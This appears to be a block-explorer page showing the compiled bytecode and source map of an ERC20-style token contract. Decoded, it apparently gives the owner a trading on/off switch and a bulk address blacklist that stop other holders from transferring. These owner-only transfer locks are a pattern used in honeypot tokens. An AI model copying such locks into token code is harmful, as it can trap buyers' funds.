9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119856025836111a6565b915061199082611929565b604082019050919050565b600060208201905081810360008301526119b481611978565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a176023836111a6565b9150611a22826119bb565b604082019050919050565b60006020820190508181036000830152611a4681611a0a565b9050919050565b50565b6000611a5d6000836111a6565b9150611a6882611a4d565b600082019050919050565b60006020820190508181036000830152611a8c81611a50565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611aef6026836111a6565b9150611afa82611a93565b604082019050919050565b60006020820190508181036000830152611b1e81611ae2565b905091905056fea26469706673582212203cd66dad9aa28015075bef80c0713d1ac3b2966beec783e6f01557e69f5b85ca64736f6c63430008090033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610288578063a9059cbb146102b8578063d6098ab0146102e8578063dd62ed3e14610304576100f5565b806370a082311461020057806391b69fa01461023057806395d89b411461023a5780639ab24eb014610258576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b45780635148d25a146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610334565b60405161010f9190611234565b60405180910390f35b610132600480360381019061012d91906112f4565b6103c6565b60405161013f919061134f565b60405180910390f35b6101506103e9565b60405161015d9190611379565b60405180910390f35b610180600480360381019061017b9190611394565b6103f3565b60405161018d919061134f565b60405180910390f35b61019e610422565b6040516101ab9190611403565b60405180910390f35b6101ce60048036038101906101c991906112f4565b61042b565b6040516101db919061134f565b60405180910390f35b6101fe60048036038101906101f99190611483565b6104d5565b005b61021a600480360381019061021591906114d0565b61060f565b6040516102279190611379565b60405180910390f35b610238610658565b005b610242610747565b60405161024f9190611234565b60405180910390f35b610272600480360381019061026d91906114d0565b6107d9565b60405161027f919061134f565b60405180910390f35b6102a2600480360381019061029d91906112f4565b61082f565b6040516102af919061134f565b60405180910390f35b6102d260048036038101906102cd91906112f4565b610919565b6040516102df919061134f565b60405180910390f35b61030260048036038101906102fd9190611483565b61093c565b005b61031e600480360381019061031991906114fd565b610a76565b60405161032b9190611379565b60405180910390f35b6060600480546103439061156c565b80601f016020809104026020016040519081016040528092919081815260200182805461036f9061156c565b80156103bc5780601f10610391576101008083540402835291602001916103bc565b820191906000526020600020905b81548152906001019060200180831161039f57829003601f168201915b5050505050905090565b6000806103d1610afd565b90506103de818585610b05565b600191505092915050565b6000600354905090565b6000806103fe610afd565b905061040b858285610cd0565b610416858585610d5c565b60019150509392505050565b60006009905090565b600080610436610afd565b90506104ca818585600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104c591906115cd565b610b05565b600191505092915050565b6104dd610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461056a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105619061166f565b60405180910390fd5b60005b8282905081101561060a576000600760008585858181106105915761059061168f565b5b90506020020160208101906105a691906114d0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610602906116be565b91505061056d565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610660610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e49061166f565b60405180910390fd5b60001515600660009054906101000a900460ff1615151415610729576001600660006101000a81548160ff021916908315150217905550610745565b6000600660006101000a81548160ff0219169083151502179055505b565b6060600580546107569061156c565b80601f01602080910402602001604051908101604052809291908181526020018280546107829061156c565b80156107cf5780601f106107a4576101008083540402835291602001916107cf565b820191906000526020600020905b8154815290600101906020018083116107b257829003601f168201915b5050505050905090565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008061083a610afd565b90506000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083811015610900576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f790611779565b60405180910390fd5b61090d8286868403610b05565b60019250505092915050565b600080610924610afd565b9050610931818585610d5c565b600191505092915050565b610944610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c89061166f565b60405180910390fd5b60005b82829050811015610a71576001600760008585858181106109f8576109f761168f565b5b9050602002016020810190610a0d91906114d0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a69906116be565b9150506109d4565b505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6c9061180b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc9061189d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cc39190611379565b60405180910390a3505050565b6000610cdc8484610a76565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d565781811015610d48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3f90611909565b60405180910390fd5b610d558484848403610b05565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc39061199b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3390611a2d565b60405180910390fd5b60011515600660009054906101000a900460ff1615151480610e905750610e61611168565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b80610ecd5750610e9e611168565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561110157600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f685760008114610f67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5e90611a73565b60405180910390fd5b5b610f73838383611191565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ffa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff190611b05565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461108f91906115cd565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110f39190611379565b60405180910390a350611158565b60011515600660009054906101000a900460ff16151514611157576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114e90611a73565b60405180910390fd5b5b611163838383611196565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111d55780820151818401526020810190506111ba565b838111156111e4576000848401525b50505050565b6000601f19601f8301169050919050565b60006112068261119b565b61121081856111a6565b93506112208185602086016111b7565b611229816111ea565b840191505092915050565b6000602082019050818103600083015261124e81846111fb565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061128b82611260565b9050919050565b61129b81611280565b81146112a657600080fd5b50565b6000813590506112b881611292565b92915050565b6000819050919050565b6112d1816112be565b81146112dc57600080fd5b50565b6000813590506112ee816112c8565b92915050565b6000806040838503121561130b5761130a611256565b5b6000611319858286016112a9565b925050602061132a858286016112df565b9150509250929050565b60008115159050919050565b61134981611334565b82525050565b60006020820190506113646000830184611340565b92915050565b611373816112be565b82525050565b600060208201905061138e600083018461136a565b92915050565b6000806000606084860312156113ad576113ac611256565b5b60006113bb868287016112a9565b93505060206113cc868287016112a9565b92505060406113dd868287016112df565b9150509250925092565b600060ff82169050919050565b6113fd816113e7565b82525050565b600060208201905061141860008301846113f4565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114435761144261141e565b5b8235905067ffffffffffffffff8111156114605761145f611423565b5b60208301915083602082028301111561147c5761147b611428565b5b9250929050565b6000806020838503121561149a57611499611256565b5b600083013567ffffffffffffffff8111156114b8576114b761125b565b5b6114c48582860161142d565b92509250509250929050565b6000602082840312156114e6576114e5611256565b5b60006114f4848285016112a9565b91505092915050565b6000806040838503121561151457611513611256565b5b6000611522858286016112a9565b9250506020611533858286016112a9565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061158457607f821691505b602082108114156115985761159761153d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115d8826112be565b91506115e3836112be565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156116185761161761159e565b5b828201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006116596020836111a6565b915061166482611623565b602082019050919050565b600060208201905081810360008301526116888161164c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006116c9826112be565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156116fc576116fb61159e565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117636025836111a6565b915061176e82611707565b604082019050919050565b6000602082019050818103600083015261179281611756565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117f56024836111a6565b915061180082611799565b604082019050919050565b60006020820190508181036000830152611824816117e8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118876022836111a6565b91506118928261182b565b604082019050919050565b600060208201905081810360008301526118b68161187a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118f3601d836111a6565b91506118fe826118bd565b602082019050919050565b60006020820190508181036000830152611922816118e6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119856025836111a6565b915061199082611929565b604082019050919050565b600060208201905081810360008301526119b481611978565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a176023836111a6565b9150611a22826119bb565b604082019050919050565b60006020820190508181036000830152611a4681611a0a565b9050919050565b50565b6000611a5d6000836111a6565b9150611a6882611a4d565b600082019050919050565b60006020820190508181036000830152611a8c81611a50565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611aef6026836111a6565b9150611afa82611a93565b604082019050919050565b60006020820190508181036000830152611b1e81611ae2565b905091905056fea26469706673582212203cd66dad9aa28015075bef80c0713d1ac3b2966beec783e6f01557e69f5b85ca64736f6c63430008090033
Deployed Bytecode Sourcemap
85:171:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2616:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4966:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3735:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5747:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3578:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6451:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13831:203;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3906:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2245:160;;;:::i;:::-;;2835:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2413:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7194:438;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4239:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13620:203;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4495:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2616:100;2670:13;2703:5;2696:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2616:100;:::o;4966:201::-;5049:4;5066:13;5082:12;:10;:12::i;:::-;5066:28;;5105:32;5114:5;5121:7;5130:6;5105:8;:32::i;:::-;5155:4;5148:11;;;4966:201;;;;:::o;3735:108::-;3796:7;3823:12;;3816:19;;3735:108;:::o;5747:295::-;5878:4;5895:15;5913:12;:10;:12::i;:::-;5895:30;;5936:38;5952:4;5958:7;5967:6;5936:15;:38::i;:::-;5985:27;5995:4;6001:2;6005:6;5985:9;:27::i;:::-;6030:4;6023:11;;;5747:295;;;;;:::o;3578:92::-;3636:5;3661:1;3654:8;;3578:92;:::o;6451:240::-;6539:4;6556:13;6572:12;:10;:12::i;:::-;6556:28;;6595:66;6604:5;6611:7;6650:10;6620:11;:18;6632:5;6620:18;;;;;;;;;;;;;;;:27;6639:7;6620:27;;;;;;;;;;;;;;;;:40;;;;:::i;:::-;6595:8;:66::i;:::-;6679:4;6672:11;;;6451:240;;;;:::o;13831:203::-;785:12:0;:10;:12::i;:::-;775:22;;:6;;;;;;;;;;:22;;;767:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13910:9:1::1;13905:122;13929:4;;:11;;13925:1;:15;13905:122;;;14010:5;13962:36;:45;13999:4;;14004:1;13999:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13962:45;;;;;;;;;;;;;;;;:53;;;;;;;;;;;;;;;;;;13942:3;;;;;:::i;:::-;;;;13905:122;;;;13831:203:::0;;:::o;3906:127::-;3980:7;4007:9;:18;4017:7;4007:18;;;;;;;;;;;;;;;;4000:25;;3906:127;;;:::o;2245:160::-;785:12:0;:10;:12::i;:::-;775:22;;:6;;;;;;;;;;:22;;;767:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2320:5:1::1;2303:22;;:13;;;;;;;;;;;:22;;;2299:99;;;2353:4;2337:13;;:20;;;;;;;;;;;;;;;;;;2299:99;;;2391:5;2375:13;;:21;;;;;;;;;;;;;;;;;;2299:99;2245:160::o:0;2835:104::-;2891:13;2924:7;2917:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2835:104;:::o;2413:133::-;2469:4;2493:36;:45;2530:7;2493:45;;;;;;;;;;;;;;;;;;;;;;;;;2486:52;;2413:133;;;:::o;7194:438::-;7287:4;7304:13;7320:12;:10;:12::i;:::-;7304:28;;7343:24;7370:11;:18;7382:5;7370:18;;;;;;;;;;;;;;;:27;7389:7;7370:27;;;;;;;;;;;;;;;;7343:54;;7436:15;7416:16;:35;;7408:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7529:60;7538:5;7545:7;7573:15;7554:16;:34;7529:8;:60::i;:::-;7620:4;7613:11;;;;7194:438;;;;:::o;4239:193::-;4318:4;4335:13;4351:12;:10;:12::i;:::-;4335:28;;4374;4384:5;4391:2;4395:6;4374:9;:28::i;:::-;4420:4;4413:11;;;4239:193;;;;:::o;13620:203::-;785:12:0;:10;:12::i;:::-;775:22;;:6;;;;;;;;;;:22;;;767:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13700:9:1::1;13695:121;13719:4;;:11;;13715:1;:15;13695:121;;;13800:4;13752:36;:45;13789:4;;13794:1;13789:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13752:45;;;;;;;;;;;;;;;;:52;;;;;;;;;;;;;;;;;;13732:3;;;;;:::i;:::-;;;;13695:121;;;;13620:203:::0;;:::o;4495:151::-;4584:7;4611:11;:18;4623:5;4611:18;;;;;;;;;;;;;;;:27;4630:7;4611:27;;;;;;;;;;;;;;;;4604:34;;4495:151;;;;:::o;862:98:0:-;915:7;942:10;935:17;;862:98;:::o;11039:380:1:-;11192:1;11175:19;;:5;:19;;;;11167:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11273:1;11254:21;;:7;:21;;;;11246:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11357:6;11327:11;:18;11339:5;11327:18;;;;;;;;;;;;;;;:27;11346:7;11327:27;;;;;;;;;;;;;;;:36;;;;11395:7;11379:32;;11388:5;11379:32;;;11404:6;11379:32;;;;;;:::i;:::-;;;;;;;;11039:380;;;:::o;11706:453::-;11841:24;11868:25;11878:5;11885:7;11868:9;:25::i;:::-;11841:52;;11928:17;11908:16;:37;11904:248;;11990:6;11970:16;:26;;11962:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12074:51;12083:5;12090:7;12118:6;12099:16;:25;12074:8;:51::i;:::-;11904:248;11830:329;11706:453;;;:::o;8111:880::-;8258:1;8242:18;;:4;:18;;;;8234:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8335:1;8321:16;;:2;:16;;;;8313:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8409:4;8392:21;;:13;;;;;;;;;;;:21;;;:40;;;;8425:7;:5;:7::i;:::-;8417:15;;:4;:15;;;8392:40;:57;;;;8442:7;:5;:7::i;:::-;8436:13;;:2;:13;;;8392:57;8388:548;;;8466:36;:42;8503:4;8466:42;;;;;;;;;;;;;;;;;;;;;;;;;8462:73;;;8529:1;8519:6;:11;8510:25;;;;;;;;;;;;:::i;:::-;;;;;;;;;8462:73;8546:38;8567:4;8573:2;8577:6;8546:20;:38::i;:::-;8597:19;8619:9;:15;8629:4;8619:15;;;;;;;;;;;;;;;;8597:37;;8668:6;8653:11;:21;;8645:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;8785:6;8771:11;:20;8753:9;:15;8763:4;8753:15;;;;;;;;;;;;;;;:38;;;;8830:6;8813:9;:13;8823:2;8813:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;8869:2;8854:26;;8863:4;8854:26;;;8873:6;8854:26;;;;;;:::i;:::-;;;;;;;;8451:441;8388:548;;;8925:4;8908:21;;:13;;;;;;;;;;;:21;;;8899:35;;;;;;;;;;;;:::i;:::-;;;;;;;;;8388:548;8946:37;8966:4;8972:2;8976:6;8946:19;:37::i;:::-;8111:880;;;:::o;1077:81:0:-;1117:7;1144:6;;;;;;;;;;;1137:13;;1077:81;:::o;12759:125:1:-;;;;:::o;13488:124::-;;;;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:117::-;5010:1;5007;5000:12;5024:117;5133:1;5130;5123:12;5147:117;5256:1;5253;5246:12;5287:568;5360:8;5370:6;5420:3;5413:4;5405:6;5401:17;5397:27;5387:122;;5428:79;;:::i;:::-;5387:122;5541:6;5528:20;5518:30;;5571:18;5563:6;5560:30;5557:117;;;5593:79;;:::i;:::-;5557:117;5707:4;5699:6;5695:17;5683:29;;5761:3;5753:4;5745:6;5741:17;5731:8;5727:32;5724:41;5721:128;;;5768:79;;:::i;:::-;5721:128;5287:568;;;;;:::o;5861:559::-;5947:6;5955;6004:2;5992:9;5983:7;5979:23;5975:32;5972:119;;;6010:79;;:::i;:::-;5972:119;6158:1;6147:9;6143:17;6130:31;6188:18;6180:6;6177:30;6174:117;;;6210:79;;:::i;:::-;6174:117;6323:80;6395:7;6386:6;6375:9;6371:22;6323:80;:::i;:::-;6305:98;;;;6101:312;5861:559;;;;;:::o;6426:329::-;6485:6;6534:2;6522:9;6513:7;6509:23;6505:32;6502:119;;;6540:79;;:::i;:::-;6502:119;6660:1;6685:53;6730:7;6721:6;6710:9;6706:22;6685:53;:::i;:::-;6675:63;;6631:117;6426:329;;;;:::o;6761:474::-;6829:6;6837;6886:2;6874:9;6865:7;6861:23;6857:32;6854:119;;;6892:79;;:::i;:::-;6854:119;7012:1;7037:53;7082:7;7073:6;7062:9;7058:22;7037:53;:::i;:::-;7027:63;;6983:117;7139:2;7165:53;7210:7;7201:6;7190:9;7186:22;7165:53;:::i;:::-;7155:63;;7110:118;6761:474;;;;;:::o;7241:180::-;7289:77;7286:1;7279:88;7386:4;7383:1;7376:15;7410:4;7407:1;7400:15;7427:320;7471:6;7508:1;7502:4;7498:12;7488:22;;7555:1;7549:4;7545:12;7576:18;7566:81;;7632:4;7624:6;7620:17;7610:27;;7566:81;7694:2;7686:6;7683:14;7663:18;7660:38;7657:84;;;7713:18;;:::i;:::-;7657:84;7478:269;7427:320;;;:::o;7753:180::-;7801:77;7798:1;7791:88;7898:4;7895:1;7888:15;7922:4;7919:1;7912:15;7939:305;7979:3;7998:20;8016:1;7998:20;:::i;:::-;7993:25;;8032:20;8050:1;8032:20;:::i;:::-;8027:25;;8186:1;8118:66;8114:74;8111:1;8108:81;8105:107;;;8192:18;;:::i;:::-;8105:107;8236:1;8233;8229:9;8222:16;;7939:305;;;;:::o;8250:182::-;8390:34;8386:1;8378:6;8374:14;8367:58;8250:182;:::o;8438:366::-;8580:3;8601:67;8665:2;8660:3;8601:67;:::i;:::-;8594:74;;8677:93;8766:3;8677:93;:::i;:::-;8795:2;8790:3;8786:12;8779:19;;8438:366;;;:::o;8810:419::-;8976:4;9014:2;9003:9;8999:18;8991:26;;9063:9;9057:4;9053:20;9049:1;9038:9;9034:17;9027:47;9091:131;9217:4;9091:131;:::i;:::-;9083:139;;8810:419;;;:::o;9235:180::-;9283:77;9280:1;9273:88;9380:4;9377:1;9370:15;9404:4;9401:1;9394:15;9421:233;9460:3;9483:24;9501:5;9483:24;:::i;:::-;9474:33;;9529:66;9522:5;9519:77;9516:103;;;9599:18;;:::i;:::-;9516:103;9646:1;9639:5;9635:13;9628:20;;9421:233;;;:::o;9660:224::-;9800:34;9796:1;9788:6;9784:14;9777:58;9869:7;9864:2;9856:6;9852:15;9845:32;9660:224;:::o;9890:366::-;10032:3;10053:67;10117:2;10112:3;10053:67;:::i;:::-;10046:74;;10129:93;10218:3;10129:93;:::i;:::-;10247:2;10242:3;10238:12;10231:19;;9890:366;;;:::o;10262:419::-;10428:4;10466:2;10455:9;10451:18;10443:26;;10515:9;10509:4;10505:20;10501:1;10490:9;10486:17;10479:47;10543:131;10669:4;10543:131;:::i;:::-;10535:139;;10262:419;;;:::o;10687:223::-;10827:34;10823:1;10815:6;10811:14;10804:58;10896:6;10891:2;10883:6;10879:15;10872:31;10687:223;:::o;10916:366::-;11058:3;11079:67;11143:2;11138:3;11079:67;:::i;:::-;11072:74;;11155:93;11244:3;11155:93;:::i;:::-;11273:2;11268:3;11264:12;11257:19;;10916:366;;;:::o;11288:419::-;11454:4;11492:2;11481:9;11477:18;11469:26;;11541:9;11535:4;11531:20;11527:1;11516:9;11512:17;11505:47;11569:131;11695:4;11569:131;:::i;:::-;11561:139;;11288:419;;;:::o;11713:221::-;11853:34;11849:1;11841:6;11837:14;11830:58;11922:4;11917:2;11909:6;11905:15;11898:29;11713:221;:::o;11940:366::-;12082:3;12103:67;12167:2;12162:3;12103:67;:::i;:::-;12096:74;;12179:93;12268:3;12179:93;:::i;:::-;12297:2;12292:3;12288:12;12281:19;;11940:366;;;:::o;12312:419::-;12478:4;12516:2;12505:9;12501:18;12493:26;;12565:9;12559:4